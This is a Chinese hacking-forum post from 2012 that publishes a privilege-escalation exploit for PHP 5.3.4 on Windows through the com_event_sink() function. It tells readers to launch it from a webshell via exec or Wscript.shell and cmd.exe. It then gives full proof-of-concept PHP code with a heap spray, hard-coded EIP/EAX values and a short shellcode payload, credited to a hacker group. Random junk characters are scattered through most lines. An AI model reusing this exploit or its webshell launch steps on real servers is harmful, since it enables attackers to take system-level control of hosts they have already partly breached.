找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2160|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中/ \8 i; J# [6 z9 Y
) l5 F8 W( k- P" n. ?9 Y" l. J
测试方法如下:cmd /c x:\php\php.exe x:\test.php9 Q1 w  @0 S- D

! ~: {" }; T+ H/ Z8 V) g7 m下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
3 D) s5 N: J# b  h这里是两个测试的截图:; y3 v, u& y" i; ]/ ^

8 J# y* [/ h/ \* b. z. M: N; B0 F0 S

3 G/ y  G7 y, N# Q0 D8 E' w' @- l  ^5 I2 T8 F/ R# Q

" L& h6 t) U! N" _! t% a成功利用此漏洞的攻击者将获得系统的最高权限
: W9 F  ^; w" F* w5 O& I3 N+ L/ I/ j; t0 K0 J8 b9 t

2 P( E# ]: h- A4 e* V# }: P( J+ g! @" ^* \$ x
0 B! m1 F2 V: d8 \' Z, S; U
  m9 s/ n8 y- b) K
关于漏洞分析稍后附上。一下是PoC代码:
( a" o; {3 p& h5 t
% e7 v$ n" ^* ~% r<?php' O" X0 r9 i& x% a6 |
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
( Z( X% e5 |  k8 _+ t6 L//$eip ="\x44\x43\x42\x41";) ^! h0 a* h! h9 Q& c: `
$eip= "\x4b\xe8\x57\x78";% d% k- B' j, H8 @* e$ s# f0 Y- p8 y
$eax ="\x80\x01\x8d\x04";; i3 ~( D& R, h& _; L  P/ z
$deodrant="";4 V2 i& r+ t& J( p! ~! J9 @7 @. A5 V
$axespray = str_repeat($eip.$eax,0x80);) }) c0 T, S  K4 H2 @; Z4 Q" W
//048d01900 ?: X; j! c; ^& N! V
echo strlen($axespray);' w8 D3 i: K# v% l4 T$ g
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";; F. e9 q# b# ]) S0 n3 P1 ~
echo "Silic Group Hacker Army - BlackBap.Org";1 D1 J, b6 H- ^
//19200 ==4B32 4b00
8 T8 ^6 g% r4 _; B& Yfor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}! L$ b( Z! a1 @3 e7 y2 T- {
$terminate = "T";4 y  v7 [$ `$ C3 ~  ~
$u[] =$deodrant;
- f0 |5 m( _# p$r[] =$deodrant.$terminate;: u( `) `/ g# g* [. g
$a[] =$deodrant.$terminate;
4 p0 c' m3 E$ v3 I) g" f& R: r1 G& k$s[] =$deodrant.$terminate;4 \+ g" `' [- s0 U4 }4 w3 j
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的: e; z4 Z  y& s5 G6 C+ W4 Y/ N7 k
$vVar = new VARIANT(0x048d0000+180);! X: e6 G% {+ t
//弹窗代码(Shellcode)
$ ~4 [- M4 L) m( k" o/ _$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";5 A" Z5 u7 z" ]
$var2 = new VARIANT(0x41414242);
1 N& n- B4 c6 C" a$ I3 Fcom_event_sink($vVar,$var2,$buffer);6 l4 s, s, w; r% r- e$ z3 c
?>
. K2 ]2 ~7 \1 f; `  b

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表